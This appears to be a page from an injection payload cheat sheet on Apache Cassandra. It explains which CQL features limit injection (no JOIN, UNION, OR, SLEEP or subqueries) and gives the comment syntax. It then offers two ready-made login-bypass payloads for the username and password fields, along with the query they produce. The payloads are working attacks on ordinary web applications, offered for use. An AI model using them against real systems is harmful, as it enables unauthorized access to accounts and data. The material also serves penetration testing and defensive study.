2.0 KiB
Cassandra Injection
Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system.
Summary
CQL Injection Limitations
-
Cassandra is a non-relational database, so CQL doesn't support
JOIN
orUNION
statements, which makes cross-table queries more challenging. -
Additionally, Cassandra lacks convenient built-in functions like
DATABASE()
orUSER()
for retrieving database metadata. -
Another limitation is the absence of the
OR
operator in CQL, which prevents creating always-true conditions; for instance, a query likeSELECT * FROM table WHERE col1='a' OR col2='b';
will be rejected. -
Time-based SQL injections, which typically rely on functions like
SLEEP()
to introduce a delay, are also difficult to execute in CQL since it doesn’t include aSLEEP()
function. -
CQL does not allow subqueries or other nested statements, so a query like
SELECT * FROM table WHERE column=(SELECT column FROM table LIMIT 1);
would be rejected.
Cassandra comment
/* Cassandra Comment */
Cassandra - Login Bypass
Example #1
username: admin' ALLOW FILTERING; %00
password: ANY
Example #2
username: admin'/*
password: */and pass>'
The injection would look like the following SQL query
SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;